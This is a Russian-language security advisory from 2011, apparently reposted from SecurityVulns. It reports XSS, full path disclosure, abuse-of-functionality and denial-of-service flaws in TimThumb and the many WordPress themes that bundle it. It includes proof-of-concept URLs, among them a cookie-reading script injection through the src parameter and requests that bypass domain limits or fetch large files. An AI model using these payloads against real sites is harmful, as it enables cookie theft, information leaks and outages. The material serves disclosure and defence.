Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:26100
HistoryApr 13, 2011 - 12:00 a.m.

Уязвимости в TimThumb и во многих темах для WordPress

2011-04-1300:00:00
vulners.com
28

Здравствуйте 3APA3A!

Сообщаю вам о найденных мною Cross-Site Scripting, Full path disclosure, Abuse of Functionality и Denial of Service уязвимостях в
TimThumb и во многих темах для WordPress.

Уязвимыми являются TimThumb и все веб приложения (в частности темы для WordPress), которые его используют. Это такие шаблоны как Live
Wire Edition, The Gazette Edition, Live Wire 2.0 и Live Wire Style.

А также следующие коммерческие шаблоны: Bookclub, Fresh News, BoldNews, Placeholder, Biznizz, Auld, Listings, Elefolio, Chapters,
Continuum, Diner, Skeptical, Caffeinated, Crisp, Sealight, Unite, Estate, The Morning After, Coda, Inspire, Apz, Spectrum, Diarise, Boast,
Retreat, City Guide, Cinch, Slanted, Canvas, Postcard, Delegate, MyStream, Optimize, Backstage, SophisticatedFolio, Bueno, Digital Farm,
Headlines, f0101, Royalle, Exposure, Therapy, Rockstar, Daily Edition, Object, Antisocial, Coffee Break, Mortar, Big Easy, Mainstream,
Groovy Photo, Groovy Blog, Feature Pitch, Suit and Tie, The Journal, myweblog, Aperture, Meta-Morphosis, Bloggingstream, The Station,
Groovy Video, Productum, Newsport, Irresistible, Cushy, WooTube, Foreword Thinking, Geometric, Abstract, Busy Bee, BlogTheme, Gotham News,
THiCK, Typebased, Over Easy, Ambience, Snapshot, Open Air, Fresh Folio, Papercut, ProudFolio, VibrantCMS, Flash News, NewsPress, The
Original Premium News и другие шаблоны для WP. Уязвимости в данных шаблонах аналогичны дырам в вышеназванных шаблонах.

XSS (WASC-08):

http://site/path/thumb.php?src=%3Cbody%20onload=alert(document.cookie)%3E.jpg

Full path disclosure (WASC-13):

http://site/path/thumb.php?src=http://

http://site/path/thumb.php?src=http://site/page.png&h=1&w=1111111

http://site/path/thumb.php?src=http://site/page.png&h=1111111&w=1

Abuse of Functionality (WASC-42):

http://site/path/thumb.php?src=http://site&h=1&w=1

http://site/path/thumb.php?src=http://site.google.com&h=1&w=1 (обход ограничений на домен, если такое ограничение включено)

DoS (WASC-10):

http://site/path/thumb.php?src=http://site/big_file

О подобных AoF и DoS уязвимостях я писал в статье Использование сайтов для атаки на другие сайты (http://websecurity.com.ua/4322/).

Уязвимы TimThumb 1.24 и предыдущие версии (и темы для WP с этими версиями). XSS возможна лишь в старых версиях программы. В версиях до
1.22 возможна AoF даже с включенным ограничением на домены через использование обходной техники. Также можно проводить DoS атаки, если
большой файл размещён на том же самом сайте, что и php-скрипт, или на разрешённом домене. Или если в скрипте разрешены внешние сайты, то
тогда можно проводить AoF и DoS атаки.

Дополнительная информация о данных уязвимостях у меня на сайте:
http://websecurity.com.ua/4910/

Best wishes & regards,
MustLive
Администратор сайта
http://websecurity.com.ua